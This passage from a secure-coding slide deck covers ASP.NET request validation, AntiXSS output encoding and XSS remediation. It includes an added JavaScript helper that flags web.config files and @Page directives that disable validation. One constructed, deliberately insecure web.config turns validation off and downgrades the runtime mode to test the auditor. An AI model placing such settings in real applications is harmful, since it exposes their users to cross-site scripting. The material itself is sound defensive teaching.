• 28. ASP.NET Request Validation
  • ASP.NET provides some blacklist-based input validation to try and guard against HTML injection and cross-site scripting (XSS) attacks
  • This is turned on by default (yeah!)
  • Many applications disable it (boo!)
    – Blocked a valid request
    – Made trouble with AJAX
    – And so on
• 29. ASP.NET Request Validation
  • How to configure or check if it is enabled?
  • This is turned on by default
  • In web.config:
    <configuration>
      <system.web>
        <pages validateRequest="true|false" />
      </system.web>
    </configuration>
  • Per-page:
    <%@ Page … ValidateRequest="true|false" %>
  • Note for ASP.NET 4 and later: request validation runs for every request before the page is involved, so a per-page ValidateRequest="false" only takes effect when web.config also sets <httpRuntime requestValidationMode="2.0" />. That setting in a web.config is itself worth chasing during a review.
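Checking whether request validation is actually on across a code base means reading every web.config and every @Page directive, which is easy to script. The following is an added example in JavaScript (Node.js), not code from the deck or from Denim Group, that audits a web.config for the site-wide switch (pages/@validateRequest) and for the ASP.NET 4 downgrade (httpRuntime/@requestValidationMode="2.0") that makes per-page opt-outs work again, and flags individual @Page directives that opt out. The weak and corrected web.config texts and the three directives are constructed for the example; the two attribute names and their meanings are standard ASP.NET configuration.

```javascript
// Added example (not from the deck): an audit helper that finds the places
// where ASP.NET request validation has been switched off, site-wide in
// web.config or per page in the @Page directive. The two web.config texts
// and the page directives are constructed for this example.

// Weak: validation disabled site-wide, and the .NET 4 runtime downgraded to
// 2.0 behaviour so that page-level switches take effect.
const WEAK_WEB_CONFIG = `
<configuration>
  <system.web>
    <httpRuntime requestValidationMode="2.0" />
    <pages validateRequest="false" />
  </system.web>
</configuration>`;

// Corrected: validation left on (the default) and no runtime downgrade.
const FIXED_WEB_CONFIG = `
<configuration>
  <system.web>
    <pages validateRequest="true" />
  </system.web>
</configuration>`;

// Constructed @Page directives as they would appear at the top of .aspx files.
const PAGE_DIRECTIVES = [
  '<%@ Page Language="C#" ValidateRequest="false" CodeBehind="Profile.aspx.cs" %>',
  '<%@ Page Language="C#" CodeBehind="Search.aspx.cs" %>',
  '<%@ Page Language="C#" validaterequest="FALSE" CodeBehind="Legacy.aspx.cs" %>',
];

// Returns a list of findings for one web.config. Attribute names are matched
// case-insensitively because hand-edited configs are rarely consistent.
function auditWebConfig(xml) {
  const findings = [];
  if (/<pages\b[^>]*\bvalidateRequest\s*=\s*["']false["']/i.test(xml)) {
    findings.push("pages/@validateRequest=false: request validation disabled site-wide");
  }
  if (/<httpRuntime\b[^>]*\brequestValidationMode\s*=\s*["']2\.0["']/i.test(xml)) {
    findings.push("httpRuntime/@requestValidationMode=2.0: per-page ValidateRequest=\"false\" is honoured again");
  }
  return findings;
}

// True when a single @Page directive turns validation off for that page.
function pageDisablesValidation(directive) {
  return /<%@\s*Page\b[^%]*\bValidateRequest\s*=\s*["']false["']/i.test(directive);
}

console.log("weak web.config:", auditWebConfig(WEAK_WEB_CONFIG));
console.log("fixed web.config:", auditWebConfig(FIXED_WEB_CONFIG));
console.log("pages opting out:", PAGE_DIRECTIVES.filter(pageDisablesValidation));
```

A clean result here means only that the blacklist is switched on. It says nothing about whether outputs are encoded, which is the remediation the rest of the deck is about.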
• 30. Microsoft Web Protection Library
  • Main site:
    – http://wpl.codeplex.com/
  • To use:
    – Import reference to AntiXSS.dll (optionally include HtmlSanitizationLibrary.dll)
      • Found in C:\Program Files (x86)\Microsoft Information Security\AntiXSS Library v4.0
    – Get access to library:
      • In code:
        – using Microsoft.Security.Application;
      • In ASPX page:
        – <%@ Import Namespace="Microsoft.Security.Application" %>
    – Make call to encode tainted data:
      • AntiXss.HtmlEncode()
      • AntiXss.HtmlAttributeEncode()
      • And so on…
• 31. Exercise: Fixing XSS Vulnerabilities
  • Java
    – Reflected XSS
    – Stored XSS
  • ASP.NET
    – Reflected XSS
    – Stored XSS
• 32. But Your ASP.NET Examples Cheated!
  • This is true: ASP.NET provides some XSS protection via the ValidateRequest functionality
  • However:
    – This can be (and often is) turned off on a per-page or site-wide basis
    – It has been defeated in the past and will be defeated again in the future
      • http://www.procheckup.com/vulnerability_manager/documents/document_1258758664/bypassing-dot-NET-ValidateRequest.pdf
      • http://www.blackhat.com/presentations/bh-usa-09/VELANAVA/BHUSA09-VelaNava-FavoriteXSS-SLIDES.pdf
  • If you want your code to be "Rugged" then you need to actually guard against cross-site scripting vulnerabilities in your code: request validation is a blacklist on the way in, and only contextual output encoding on the way out closes the hole
• 33. Resources
  • OWASP ESAPI
    – http://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API
  • Microsoft Web Protection Library
    – http://wpl.codeplex.com/
  • Denim Group Remediation Resource Center
    – www.denimgroup.com/remediation
• 34. Questions?
  Dan Cornell
  dan@denimgroup.com
  Twitter: @danielcornell
  www.denimgroup.com
  (210) 572-4400